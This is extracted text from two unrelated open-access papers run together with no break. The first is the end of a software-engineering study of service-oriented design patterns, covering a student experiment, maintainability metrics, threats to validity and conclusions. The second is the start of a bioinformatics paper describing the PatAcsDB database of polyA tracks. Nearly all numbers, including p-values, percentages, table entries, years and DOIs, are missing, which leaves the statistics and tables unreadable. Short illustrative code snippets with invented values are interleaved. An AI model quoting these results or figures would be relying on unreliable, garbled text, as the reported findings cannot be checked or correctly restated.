since median effectiveness of both groups is identical ( / ), the resulting p-value for the hypothesis test is much too large ( . ). this means we cannot reject h and therefore have no support for h that more exercises can be completed for pattern version # . for efficiency, we first tested all three tasks at once (h ) where we identified a mean difference of about %. the resulting p-value of . is barely below the . level, but since we need a significance level of . due to multiple hypotheses, this is still too large. we therefore cannot confidently reject our null hypothesis h , that is, we cannot support h that the pattern group # was overall more efficient on a statistically table result measures per group (sd represents the standard deviation; for difficulty questions based on the -point ordinal scale, represents “not difficult” while represents “very difficult”). group # (no patterns) group # (patterns) participants that solved task# ( %) ( %) participants that solved task# ( %) ( %) participants that solved task# ( %) ( %) effectiveness median / / st quartile / / rd quartile / / reported difficulty for task# ( – ) mean . . sd . . reported difficulty for task# ( – ) mean . . sd . . reported difficulty for task# ( – ) mean . . sd . . duration per individual task mean : : ( , s) : : ( , s) sd : : ( , s) : : ( , s) duration for task# mean : : ( , s) : : ( , s) sd : : ( , s) : : ( , s) duration for task# mean : : ( , s) : : ( , s) sd : : ( s) : : ( s) duration for task# mean : : ( , s) : : ( s) sd : : ( s) : : ( s) duration for all three tasks (in total) mean : : ( , s) : : ( , s) sd : : ( s) : : ( , s) bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ significant level. when performing the same test for the three tasks individually, the resulting p-values are . (task# ), . (task# ), and . (task# ) respectively. this means that with our bonferroni-corrected significance level of p � . (desired significance level divided by the number of hypotheses ⇒ a = . / = . ) we could only reject h and identify support for h (task# , patterns: event-driven messaging/ inversion of communications). a post-hoc power analysis for our only successful hypothesis test (i.e. the probability that the test correctly rejected the null hypothesis) revealed that the statistical power is sufficient ( . ). as pointed out, all other four null hypotheses (h , h , h , h ) could not be rejected. metric analysis for a second comparison of the two system versions, we chose and collected measurements for nine different maintainability metrics (see table ) related to structural design properties such as size, complexity, and coupling from the final systems (post-experiment optimal solutions, see figs. and ). some of these metrics are pretty simple (e.g. # of services or lines of code (loc)). since a number of more sophisticated maintainability metrics specifically designed for service orientation have been suggested in scientific literature (bogner, wagner & zimmermann, ), we also chose some of these (e.g. service interface data cohesion (sidc) or absolute dependence of the service (ads)). all metrics (except for # of services) were collected per service and then aggregated to the system level with aggregation functions such as sum, mean, or max. 
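As a small illustration of this aggregation step, the snippet below collapses hypothetical per-service measurements into the system-level aggregates used in the comparison; the service names and values are invented and do not reflect the actual measurements.

```python
import statistics

# hypothetical per-service LOC values (invented numbers, only to show the aggregation)
loc_per_service = {
    "webui": 1200,
    "ordersrv": 640,
    "productsrv": 980,
    "customersrv": 310,
    "notificationsrv": 150,
}

values = list(loc_per_service.values())
system_level = {
    "sum": sum(values),
    "mean": statistics.mean(values),
    "median": statistics.median(values),
    "max": max(values),
}
print(system_level)
```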
figure: boxplot comparison of the duration per version and task (y-axis: duration in sec; groups: # (no patterns) and # (patterns); tasks: # process abstraction, # service facade, # event-driven messaging).

before we describe the detailed metric results, we briefly present the selected metrics, explain our rationale for choosing them, and point out how they were collected.

table: list of the nine selected maintainability metrics to analyze both versions.
metric name | design property | source
# of services | size | –
lines of code (loc) | size | –
weighted service interface count (wsic) | size | hirzalla, cleland-huang & arsanjani ( )
loc/wsic | granularity | –
cyclomatic complexity (cc) | complexity | mccabe ( )
service interface data cohesion (sidc) | cohesion | perepletchikov ( )
absolute dependence of the service (ads) | coupling | rud, schmietendorf & dumke ( )
relaxed ads | coupling | –
absolute importance of the service (ais) | coupling | rud, schmietendorf & dumke ( )

metric definitions
in the area of size and granularity, we selected four metrics. the premise with these metrics is that a smaller system with appropriate service granularity (not too many services, not too large services) will be easier to understand and maintain. the first one was # of services, which already is a proxy for system size and therefore does not need to be aggregated. so, if we assume unchanged granularity, fewer services are generally easier to grasp and maintain. we manually derived # of services from the final architecture diagrams. in both versions, the webui was counted as a service while in the pattern version # , the kafka broker was not counted as a service, as it does not contain custom code and is an infrastructure component. as a second metric, we selected the prevalent loc metric that we collected for each service via the static analyzer sonarqube (https://www.sonarqube.org). we then created system-level loc aggregates with sum, mean, median, and max. since loc is sometimes seen as controversial (e.g. if several programming languages are involved), we also selected a volume metric specifically designed for service orientation, namely the weighted service interface count (wsic) by hirzalla, cleland-huang & arsanjani ( ). wsic represents the count of publicly available operations in a service interface with possible weights for different types of operations (e.g. synchronous and asynchronous). we used the standard weight of , which is basically the same as # of operations. values for wsic were automatically derived from the existing openapi (https://github.com/oai/openapispecification) files with a self-developed analysis tool. like loc, wsic was also aggregated with sum, mean, median, and max. to gain further granularity-related insights in addition to the means and medians of our two volume metrics, we also calculated their ratio, that is, loc/wsic. for a given service, this represents the number of locs that are on average necessary to provide a single operation.
larger values for loc/wsic mean a service has large and potentially complex operations. this metric was aggregated with mean, median, and max. as a measure for complexity, we selected cyclomatic complexity (cc) from mccabe ( ) as a traditional source code metric. while some suggestions for service-based complexity metrics like response for operation (perepletchikov et al., ) or message entropy (mateos et al., ) exist, tool support for their collection is not available and they are hard to calculate manually. despite its criticisms (ostberg & wagner, ), we therefore relied on the widely used cc metric that was gathered for each service via sonarqube. we then subsequently aggregated the values with mean, median, and max. lower values for cc suggest that a service is easier to understand and maintain. in the context of cohesion, we chose the sidc metric proposed by perepletchikov ( ). sidc rates the cohesion of a service interface in percent based on the input and response parameter data types of its operations. if a service interface operates on the same or only a small set of data abstractions (e.g., crud operations for a customer entity), the values for sidc will be closer to % and the service will be easier to analyze and change. we used the already mentioned openapi analysis tool to automatically calculate the percentage values for sidc. these values were then aggregated with mean, median, and min (as lower values are worse). the last maintainability-related design property that we wanted to measure was coupling. in the service-oriented space, “loose coupling” is a prevalent theme aiming to reduce the number and strength of service dependencies and therefore preventing or mitigating ripple effects on changes (pautasso & wilde, ). we therefore chose three metrics to analyze the degree of coupling in both versions, where lower values mean less coupling and therefore increased maintainability. all coupling metrics were manually derived from the final architecture diagrams that also include the dependencies between services. moreover, the same aggregations were used for all of them, namely mean, median, and max. first, we selected the ads metric proposed by rud, schmietendorf & dumke ( ). for a given service, ads represents the number of other services that this service depends on, that is, of which it invokes at least one operation. for pattern version # , dependencies to the kafka broker were counted as well. since ads treats every static dependency exactly in the same way, we also collected values for an adjusted variant of ads that respects looser types of coupling. in that sense, relaxed ads works like ads, except that dependencies to a service façade or the kafka broker were counted with . instead of . the rationale for this was that these two patterns are introduced as intermediaries to reduce coupling. as a consequence, dependencies to them should not be weighted in the same way as direct invocations of services. in version # of the system, the values for relaxed ads are therefore exactly the same as for ads. only in the pattern version # , the values for the two variants differ. the third and last coupling metric, also proposed by rud, schmietendorf & dumke ( ), is complementary to ads, namely the metric absolute importance of the service (ais). for a given service, ais represents the number of other services that have a dependency to this service, that is, that invoke at least one of its operations. 
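To show how the three coupling metrics relate, the following sketch derives ADS, relaxed ADS, and AIS from a small invented dependency map. The 0.5 weight for dependencies on the facade and the broker mirrors the relaxed ADS rationale described above; the service names and edges are examples only, not the systems' actual dependency structure.

```python
import statistics

# outgoing dependencies per service (invented example loosely following the pattern version)
dependencies = {
    "webui":           ["orderprocesssrv", "productsrvfacade", "customersrv"],
    "orderprocesssrv": ["ordersrv", "productsrvfacade", "customersrv", "notificationsrv"],
    "productsrv":      ["kafka_broker"],
    "notificationsrv": ["kafka_broker"],
}
# intermediaries whose dependencies count with a reduced weight in relaxed ADS
loose_targets = {"productsrvfacade", "kafka_broker"}

def ads(callees):
    # absolute dependence: number of services this service depends on
    return len(callees)

def relaxed_ads(callees):
    # same as ADS, but facade/broker dependencies are weighted 0.5 instead of 1
    return sum(0.5 if c in loose_targets else 1.0 for c in callees)

def ais(service, deps):
    # absolute importance: number of services that depend on this service
    return sum(service in callees for callees in deps.values())

all_services = sorted(set(dependencies) | {c for cs in dependencies.values() for c in cs})
ads_values = [ads(dependencies.get(s, [])) for s in all_services]
rads_values = [relaxed_ads(dependencies.get(s, [])) for s in all_services]
ais_values = [ais(s, dependencies) for s in all_services]

for name, values in (("ads", ads_values), ("relaxed ads", rads_values), ("ais", ais_values)):
    print(name, "mean/median/max:",
          round(statistics.mean(values), 2), statistics.median(values), max(values))
```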
since the invocation origin is not really important, we did not gather a relaxed ais variant. bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ metric results to compare the two system versions, we only present the aggregated system-level metrics in this paper (see table ). for a detailed comparison of the underlying service-level metrics, please refer to the metric evaluation spreadsheet in our repository (https://github. com/xjreb/researchmodifiability-pattern-experiment/blob/master/_results/metric- analysis.xlsx) that includes the measurements for each service. when comparing the system-level metrics for size, we immediately see that pattern version # is larger. it has two more services (orderprocesssrv and table system-level metric results per version (change in % refers to the change of the metric value from v to v ; a positive percentage means v is better, a negative one means v is better; in cases with a change of at least %, the better version is marked with a colored background). metric aggregate version # (no patterns) version # (patterns) change in % # of services – . loc sum , , . mean . median . max . wsic sum . mean . . . median . max . loc/wsic mean . . . median . . - . max . . . cc mean . . - . median . . - . max . sidc mean . . - . median . . . min . . . ads mean . . - . median . max - . relaxed ads mean . . - . median . - . max . - . ais mean . . - . median . max . bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/xjreb/researchmodifiability-pattern-experiment/blob/master/_results/metric-analysis.xlsx https://github.com/xjreb/researchmodifiability-pattern-experiment/blob/master/_results/metric-analysis.xlsx https://github.com/xjreb/researchmodifiability-pattern-experiment/blob/master/_results/metric-analysis.xlsx http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ productsrvfaçade) and therefore consists of ∼ % more loc and ∼ % more operations. even though the kafka broker is also new in version # , it is not counted as a service. while mean and median for the size metrics are only slightly worse or stay roughly the same in version # , the max value for wsic increases by ∼ % (from nine to operations). this is due to the newly introduced productsrvfaçade that relays calls to the productsrv, categorysrv, and warehousesrv. lastly, the introduction of the orderprocesssrv in version # impacted the loc/wsic ratio. while the median is slightly better for version # (∼ %), both the mean value (∼ %) and the max value (∼ %) are worse. the reason for this is that the orderprocesssrv provides only a single operation while simultaneously consisting of slightly above average loc. for both complexity and cohesion, our chosen metrics do not show much differences between the two versions. cc aggregates are very similar, with the only notable difference being a slightly larger max value (∼ %) for version # . this is caused by adding the messaging functionality to the notificationsrv. aggregates for sidc are even more similar, which suggests that the patterns at hand do not influence service cohesion all that much. the only design property that seems slightly better in pattern version # is coupling. while the mean and median aggregates of ads stay the same in both version, the max value in version # has been reduced by %: the productsrvfaçade shields the services behind it so that the webui has one dependency less (four instead of five). 
if we treat looser forms of coupling differently, version # improves even further. for relaxed ads, all aggregates are better in the pattern version (mean by ∼ %, median by %, and max by %), because the kafka broker and productsrvfaçade reduce the weight of service dependencies. finally, even though the median and max aggregates for ais are the same in both versions, the mean value is improved by ∼ % in version # . this is caused by the event-driven messaging/inversion of communications patterns. the kafka broker does not actively call services, but services have to publish or subscribe to it. therefore, the sum values for ads and ais would also be different in version # , even though they would be the same in version # . discussion from the experiment results, we could not derive support for the majority of our hypotheses that service-based patterns had a positive impact on participant effectiveness and efficiency. the mean difference in duration was only significant for task # in isolation. we offer three main interpretations to explain these results. one straightforward possibility is that the patterns of task # (process abstraction) and task # (service façade and decomposed capability) were simply not effective enough to enhance the modifiability of the system under test. their theoretical benefit for the chosen evolution scenario did not (or only partially) translate to a practical setting. only event-driven messaging/inversion of communications from task # led to a significant advantage for the system’s evolvability. while this seems plausible at first sight and our chosen patterns may certainly differ in their effectiveness, we believe that our second and third interpretations are more likely. another explanation for the results may be that the effect of familiarization and experience was stronger for the pattern version # . as they progressed through the tasks, bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ participants naturally grew more accustomed to the system and workspace environment. since the pattern version # exhibited a higher base complexity (more services, more inter-service communication, more build scripts to start before task validation), participants of this group were initially slowed down more than the control group. over the course of the experiment, they gradually adjusted to this so that the effectiveness of the chosen patterns for the evolution scenario could unfold (slightly in task# and fully in task# ). this effect could have been weakened by randomizing the order of tasks per participant. unfortunately, this was not possible because tasks depended on each other. we also offer a possible third explanation in conjunction with the familiarization effect. the patterns’ effect on modifiability seems to have been influenced by whether participants had conscious knowledge of and experience with patterns beforehand. when we analyzed existing correlations between effectiveness and self-reported experience-related factors, we observed that both knowledge of general design patterns as well as service-oriented patterns was more strongly correlated with effectiveness in the pattern group # than in group # : about % more for general patterns (kendall’s tau: . vs . ) and about % more for service-oriented ones (r-values: . vs . ). years of programming experience, for example, was similarly correlated with effectiveness in both groups (r-values: . vs . ). 
so using students instead of experienced professionals who have worked with patterns before seems to have hurt treatment group # more. the potential modifiability-related benefit of a pattern may be lessened or even negated by its complexity and impact on understandability if the participant is not familiar with the pattern. potential support for this can be found by narrowing down the sample for both groups to only the best participants. when we filter for only the students that solved at least task # and task # (effectiveness of at least %), the mean efficiency difference increases: instead of ∼ %, participants of pattern group # now needed ∼ % less time per task.

overall, the results suggest that the theoretical evolvability-related advantage of service-oriented patterns is difficult to replicate in controlled experiments: familiarity with the system and experience with the selected patterns seem to have an impact on the patterns' effectiveness. for inexperienced developers unfamiliar with the system, the additional complexity introduced by the patterns seems to reduce or even outweigh the theoretical positive effect on modifiability. implications of such a conclusion could be that appropriate documentation of the used service-oriented patterns as well as thorough pattern-focused initial training of new developers become all the more important to ensure a long-term and sustainable effect of patterns on software evolvability.

with respect to the metric analysis, we observed that the pattern version # is worse in the area of size and granularity and better for coupling. our chosen complexity and cohesion metrics are not impacted by the patterns. when counting only changes in metric values of at least %, version # is superior for six size and granularity aggregates (# of services, locsum, wsicsum, wsicmax, loc/wsicmean, and loc/wsicmax), while version # is better for five coupling aggregates (adsmax, relaxed adsmean, relaxed adsmedian, relaxed adsmax, and aismean). however, three of these five improvement areas for version # are aggregates of relaxed ads, a metric that we specifically constructed for the loose-coupling nature of the used patterns. without relaxed ads, the pattern version would only be significantly better for two coupling aggregates (adsmax and aismean). all in all, the comparison of structural metrics showed no decisive maintainability improvements in the pattern version, which seems to be in line with the experiment results. the increased system size and slightly worsened granularity in version # may support our interpretation that it took longer in this group until the familiarization effect kicked in. more services and operations meant that participants were potentially under higher cognitive load and required more effort to get familiar with the system. lastly, the partially improved coupling measurements in the pattern version could explain why participants in this group required less time for task # and especially task # : these tasks relied on the patterns service façade and event-driven messaging, which are both related to decoupling.

threats to validity

threats to validity have to be examined in several areas of this empirical study. with respect to construct validity, our operationalized experiment measure (namely the time necessary to implement a feature) seems valid to represent the construct in a practical real-world setting.
efficiency is one of the most used measures for software engineering experiments and, in contrast to maintainability metrics, it is not a structural approximation of this quality attribute. effectiveness, that is, the degree to which participants solved all tasks within the given time frame, is a similarly popular measure in software development, even though efficiency is more relevant in a real-world industry setting: most often, the question is not whether something can be implemented, but how long it will take. lastly, the results of the metric analysis rely on the maintainability prediction quality of the chosen metrics. several of these metrics (e.g. loc or cc) are well known and have been extensively studied, but especially some of the younger service-oriented metrics have not been evaluated in or accepted by large-scale industry environments. so, while the chosen design properties seem very fitting for a service-oriented context, the metrics selected to represent them may be of differing quality. similarly, only a limited number of metrics was analyzed and there is always the possibility for more or different metrics.

internal validity is concerned with how much the treatment was actually responsible for the observed effect and whether there were unknown factors that influenced the results. during the discussion of the experiment, we already mentioned the observed impact of the participants' pattern knowledge on the effective modifiability of the patterns. a possible solution to this could have been to only accept participants with a base level of pattern experience or to include a small lecture on service-oriented patterns in the introductory presentation. we also already described the familiarization effect for later tasks, which makes it harder to analyze the effectiveness of each individual pattern. task randomization as a solution to this was not possible because the task order was important in the constructed evolution scenarios. furthermore, participants were forced to use the provided experiment workspace via a virtual machine. while most students should be somewhat familiar with eclipse, their preferred ide, os, or build tool may be different from the provided environment. this could have hindered their development speed. we have to assume that this effect was similar for each group and task. moreover, participants were allowed to ask questions if they were not related to the actual coding, but to the experiment environment (e.g., ide, build tool, and evaluation ui). a last potential threat in this area is the general coding ability of participants, which may tamper with the results: students that are very slow or very fast in general work with similar speed regardless of the group. since participants only worked on one version in our experiment, an uneven distribution of very slow or very fast students could have affected the groups' mean efficiency. while a population of our size has a smaller risk of being influenced by this than a very small sample, and our post-experiment survey did not reveal major experience differences between the groups, the self-reported nature of the comparison still leaves some room for issues. possible solutions could have been to conduct a pilot evaluation study with the participants to divide them into two groups of similar skill, or to let participants work on tasks from both groups in a rotating manner.
neither solution was used because of time and effort constraints. concerning the metric analysis, we relied on the correctness of the collected measurements. more complex metrics were gathered automatically with tool support, while simple metrics were manually derived (e.g. from architecture diagrams) and double-checked across researchers. even though it is not very likely, there still remains a small possibility of incorrect metric values that may have clouded the analysis.

external validity refers to the generalizability of the results to the target population and setting. while the usage of students may be a valid proxy for the desired target population in many cases, our experiment was very challenging for bachelor students. only ∼ % solved all three tasks and ∼ % could not solve any task. we also hypothesize that the missing degree of pattern experience influenced the treatment group's effectiveness and efficiency. therefore, we expect that a replication with experienced software professionals from industry would yield different results. however, such a replication with a sufficient number of participants is extremely difficult to organize. we created both versions of the web shop system as close to the real world as possible. nonetheless, controlled experiment tasks are still inherently of a somewhat artificial nature, with the potential for subjective bias. the experiment results are also bound to the used programming language (java) and service-based communication style (restful http). moreover, we designed the tasks with the intuitive feeling that the pattern version # might be faster to change, because the patterns are perfectly suited for the changes at hand. the benefit of a pattern will always heavily depend on the specifics of the evolution scenario that is performed. in conjunction with this, developers are usually decently familiar with the system that they extend. so, in a real-world software maintenance scenario, the benefits of modifiability mechanisms and patterns often manifest over a long period of time with increasing developer familiarity with the system. the artificial construction of the two system versions may also have impacted the reliability of the metric-based analysis. after all, we evaluated the internal quality of artifacts that were created by ourselves, which leaves possibilities for researcher bias. to mitigate these threats, metric collection was performed by external research assistants (see "acknowledgments") and the final set of metrics was not known during the system construction period. nonetheless, using several existing industry or open source systems for the metric-based analysis of patterns would have provided more objective results. in the case of our study, however, the goal of the evaluation with metrics was to provide a second perspective on the two experiment system versions. lastly, one must be very careful to generalize from the results of four patterns, a total of student participants, and nine metrics to all patterns and software developers. the controlled experiment presents first empirical insights into the modifiability of selected service-oriented patterns with inexperienced human participants, while the metric study provides additional structural insights that aim to further the understanding of the patterns' effects.
however, many more similar studies should follow to either support or reject the conclusions of this research.

lessons learned from the experiment

we experienced a number of limitations with our experiment design that hindered our means for analysis and interpretation. to aid future controlled experiments in the area of design patterns' impact on modifiability and to prevent researchers from repeating the same mistakes, we documented some lessons learned. first, tasks should not depend on each other. this makes it possible to randomize the task order per participant to lessen the familiarization effect and analyze the impact of individual patterns. furthermore, fixed maximum durations per task can then be set, which ensures that participants work on all tasks. this may obviously decrease the overall number of solved tasks, though, especially if they are difficult. another suggestion is to conduct a pilot experiment with similar tasks to rate participants. this rating can then be used to randomly draft individuals to ensure similarly skilled groups. as a less time-consuming alternative, a survey with self-reported skill can be used. if a pre-experiment study is not possible, tasks could be designed to allow participants to work on both versions of the system in alternating fashion. an even number of tasks should be chosen in this case. lastly, it is strongly advised to ensure participants' familiarity with the patterns; otherwise their effect will be reduced. in combination with this, the most realistic software maintenance/evolution scenario requires that participants are already familiar with the system to a certain degree. this could be achieved by using an existing system and its developers, although a second version would need to be constructed. if no fitting existing system is identified and time allows it, a long-term familiarization period with artificial systems could be used before the actual experiment.

conclusion

to analyze the impact of service-oriented design patterns on software evolvability, we conducted a controlled experiment with bachelor students. participants had to change and extend a service-based web shop system in two functionally equivalent versions over the course of three tasks. we measured effectiveness and efficiency per group. while median effectiveness was the same for both groups ( / ), we saw differences in the mean efficiency, that is, the mean duration per task. participants in the treatment group with patterns were about % faster ( : : vs : : ), but due to bonferroni correction not at a statistically significant level (p-value: . ). when analyzing each individual task, we found only the group difference for task # (pattern: event-driven messaging) to be of a significant nature (p-value: . ). here, participants in the treatment group needed about % less time. during the subsequent analysis of the two system versions with nine maintainability metrics, the pattern version # exhibited worse measurements in the area of size and granularity and better measurements for coupling, even though the most improved coupling metric was specifically designed for the patterns' type of dependency (relaxed ads). complexity as well as cohesion measurements were similar between the two versions. overall, we did not observe decisive maintainability metric improvements in the pattern version, which seems to be in line with the experiment results.
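the bonferroni adjustment mentioned above can be reproduced in a few lines; the raw p-values in this sketch are placeholders rather than the study's actual results, and the underlying per-task significance test itself is left abstract.

```python
# Minimal Bonferroni adjustment over several comparisons (overall plus per task).
# The raw p-values below are placeholders, not the experiment's actual results.
raw_p = {"all_tasks": 0.04, "task_1": 0.60, "task_2": 0.25, "task_3": 0.01}
m = len(raw_p)      # number of comparisons
alpha = 0.05

for name, p in raw_p.items():
    adjusted = min(1.0, p * m)   # Bonferroni: multiply each p-value by the number of tests
    verdict = "significant" if adjusted < alpha else "not significant"
    print(f"{name}: raw p={p:.3f}, adjusted p={adjusted:.3f} -> {verdict}")
```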
our interpretation of these results is that we have no clear indication that three of the four selected service-based patterns were beneficial for evolvability. we theorize, however, that the additional volume introduced by the patterns initially hindered participants in leveraging their modifiability-related benefits, which seems to be supported by the size and granularity metrics. over the course of the experiment, participants became more and more familiar with the system and the patterns, which allowed the treatment group to get a slight edge in task # and finally produced full statistical significance in task # . the implications of these results are that documentation and training of the used service-based patterns should not be neglected in software maintenance and evolution scenarios.

with respect to possible future work, we already mentioned the lack of empirical quantitative research on service-oriented patterns and qas (in our case evolvability). it is therefore necessary that future research provides additional support in this area. many patterns for soa and also some for microservices are available, and one study can only cover so many of them. moreover, additional research could also aim to confirm and quantify the impact of developers' pattern experience on the effectiveness of the patterns. additionally, the metric-based analysis of patterns could be extended to existing industry or open source systems to mitigate the construction bias. as an alternative, several practitioners or external researchers could implement systems with these patterns to allow for a more objective analysis. to support such endeavors and to enable potential replication studies, we shared all artifacts related to the experiment and metric analysis on github (https://github.com/xjreb/researchmodifiability-pattern-experiment) and zenodo (doi . /zenodo. ) (source code, task descriptions, survey questions, result data sets, analysis script).

acknowledgements

we kindly thank daniel graziotin from the university of stuttgart as well as maximilian jager from the university of mannheim for the fruitful discussions about our paper and specifically about the used statistical methods. furthermore, we thank aretina iazzolino, philipp meyer, and daniel quack (all from the university of stuttgart) for their diligent support with the metric analysis. lastly, we are very grateful for the constructive and detailed feedback provided by our reviewers.

additional information and declarations

funding: this work was funded by the ministry of science of baden-württemberg, germany, for the doctoral programme "services computing." the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures: the following grant information was disclosed by the authors: ministry of science of baden-württemberg, germany.

competing interests: justus bogner is not only a phd student, but also a software engineer at dxc technology. stefan wagner and alfred zimmermann have no potential competing interests.
author contributions
• justus bogner conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.
• stefan wagner conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft.
• alfred zimmermann conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft.

data availability
the following information was supplied regarding data availability: data is available at zenodo: bogner, justus. ( ). data and analysis artifacts for service-based evolvability patterns (experiment and metrics) [data set]. zenodo. http://doi.org/ . /zenodo. .
patacsdb—the database of polya translational attenuators in coding sequences

submitted december accepted january published february corresponding author pawel szczesny, szczesny@ibb.waw.pl academic editor tak-wah lam additional information and declarations can be found on page doi . /peerj-cs. copyright habich et al. distributed under creative commons cc-by . open access

patacsdb—the database of polya translational attenuators in coding sequences. malgorzata habich, sergej djuranovic and pawel szczesny. institute of biochemistry and biophysics polish academy of sciences, department of bioinformatics, warsaw, poland; department of cell biology and physiology, washington university school of medicine, saint louis, mo, united states of america; faculty of biology, institute of experimental plant biology and biotechnology, university of warsaw, warsaw, poland.

abstract

recent additions to the repertoire of gene expression regulatory mechanisms are polyadenylate (polya) tracks encoding for poly-lysine runs in protein sequences. such tracks stall the translation apparatus and induce frameshifting independently of the effects of the charged nascent poly-lysine sequence on the ribosome exit channel. as such, they substantially influence the stability of mrna and the amount of protein produced from a given transcript. single base changes in these regions are enough to exert a measurable response on both protein and mrna abundance; this makes each of these sequences a potentially interesting case study for the effects of synonymous mutation, gene dosage balance and natural frameshifting. here we present patacsdb, a resource that contains a comprehensive list of polya tracks from over eukaryotic genomes. our data is based on the ensembl genomic database of coding sequences and filtered with the a- algorithm, which selects polya tracks with a minimal length of a's, allowing for one mismatched base. the patacsdb database is accessible at: http://sysbio.ibb.waw.pl/patacsdb. the source code is available at http://github.com/habich/patacsdb, and it includes the scripts with which the database can be recreated.
subjects bioinformatics, databases
keywords ribosome stalling, gene regulation, eukaryotic genomes, mrna stability, translation
how to cite this article: habich et al. ( ), patacsdb—the database of polya translational attenuators in coding sequences. peerj comput. sci. :e ; doi . /peerj-cs.

background

the classical view of the genetic information flow inside living cells—the transcription from dna to rna and finally the translation of mrna into protein—is a subject of continuous modification, both in the direction of the flow and in the number of players involved. after decades of research we keep accumulating evidence of several control points at different levels of these processes. past studies focused on transcriptional regulation, but more recently the regulation of gene expression at the level of translation has drawn researchers' attention. translational regulation generally controls the amount of protein synthesised from a given mrna through several mechanisms, targeting recruitment of ribosomes to
the transcript, elongation speed, termination and, as a proxy to all these processes, mrna stability. ribosome stalling—the pausing of the ribosome during the translational cycle—is recognized by components of several mrna surveillance pathways. as a result of the impeded rate of the ribosome along the mrna, the transcript is endonucleolytically cleaved and the nascent, albeit incomplete, protein product is degraded by the proteasome (shoemaker & green, ). over the years, we have got to know that certain sequence features can trigger ribosome stalling. these are damaged bases (cruz-vera et al., ), stable stem-loop structures (doma & parker, ), rare codons (letzring, dean & grayhack, ), mrnas lacking stop codons (so-called non-stop mrnas) (dimitrova et al., ), runs of codons that encode consecutive basic amino acids (kuroha et al., ; brandman et al., ), or, finally, runs of adenines encoding poly-lysine tracks (koutmou et al., ; arthur et al., ). we have recently shown that polya tracks trigger a response in a different manner than runs of basic amino acids (arthur et al., ). in addition to stalling, they occasionally lead to ribosome sliding on the mrna transcript, which results in the production of an additional frameshifted product next to the known and well-annotated gene protein product. as such, polya track sequences may support programmed translational frameshifts in these mrna transcripts, giving rise to alternative protein products from those genes. this feature of polya track genes resembles the programmed frameshifting observed in viral genes with slippery sequences, however without a need for the additional mrna structures that induce ribosome stalling in known viral transcripts (chen et al., ; yan et al., ). the ultimate control over the production and stability of alternative transcripts from polya track genes in eukaryotes would be based on mrna surveillance mechanisms, mainly non-sense mediated mrna decay (nmd) or, if the kinetic stall persists, no-go mrna decay (ngd). polya tracks are highly conserved in genes among eukaryotes and it is likely that they represent universal translational attenuators or programmed translational frameshift signals. intrinsically, this novel rna motif plays an important role in balancing gene dosage and the homeostasis of the cellular environment. the level of attenuation, frameshifting and the exact role of polya tracks in organismal homeostasis is still to be elucidated.

patacsdb server

while there are several resources devoted to polyadenylation signals in genomic sequences, these have a different sequence signature and refer to the processing of mrna, not translation. no genomic database reports polya tracks in coding sequences; therefore we have designed patacsdb (polya translational attenuators in coding sequences database), a resource devoted to the collection of such features among eukaryotic organisms. in concordance with our experimental data from the controlled expression of reporter sequences or natural gene expression profiles, we have designed the a- pattern, that is, a pattern of twelve adenines in the coding region allowing for one mismatch. based on our experiments, this is a minimal pattern that should result in a reduction of expression by roughly %, a magnitude that can potentially have a measurable biological impact in human cells (arthur et al., ). we have extrapolated this pattern to other organisms because, without further experimental work, we have no way to define the minimal polya pattern in other organisms.
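a pattern of twelve adenines with at most one mismatch can be located with a simple sliding-window scan. the sketch below is our own reimplementation of the idea for illustration, not the exact script shipped in the patacsdb repository; only the 12-base/one-mismatch thresholds are taken from the description above, and the example sequence is invented.

```python
def polya_tracks(cds, min_len=12, max_mismatches=1):
    """Return (start, end, track) tuples for polyA tracks in a coding sequence.

    A track is reported for every region that contains a window of at least
    `min_len` bases with at most `max_mismatches` non-A bases, extended greedily
    to the right while the mismatch budget holds.
    """
    cds = cds.upper()
    hits = []
    i = 0
    while i + min_len <= len(cds):
        window = cds[i:i + min_len]
        if sum(1 for b in window if b != "A") <= max_mismatches:
            end = i + min_len
            while end < len(cds):
                candidate = cds[i:end + 1]
                if sum(1 for b in candidate if b != "A") > max_mismatches:
                    break
                end += 1
            hits.append((i, end, cds[i:end]))
            i = end  # continue scanning after this track
        else:
            i += 1
    return hits

# Example with a short, made-up coding sequence containing one embedded track.
example = "ATGGCTAAAAAAGAAAAAAATGGC"
print(polya_tracks(example))
```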
table : summary of the content of patacsdb. the table lists, for each feature, the corresponding value: the total number of polya-carrying transcripts; the five organisms with the highest percentage of polya-carrying transcripts (plasmodium berghei, plasmodium yoelii, plasmodium falciparum, plasmodium chabaudi and plasmodium reichenowi); the five organisms with the lowest percentage (pythium vexans, saprolegnia diclina, leishmania major, phytophthora sojae and salpingoeca rosetta); the median and average percentage of polya-carrying transcripts; and the ten longest polya tracks, all of which come from plasmodium reichenowi and plasmodium falciparum strains.

we have analyzed eukaryotic ensembl genomes (flicek et al., ) for the presence of this pattern in coding sequences, using only those entries for which the coding sequence matched the reported translated sequence. this was done not only on the standard ensembl genomes but also on additional eukaryotic databases such as ensembl protists and ensembl metazoa. as a result, we have identified , genes in genomes that carry , polya tracks.

polya tracks across eukaryotic organisms

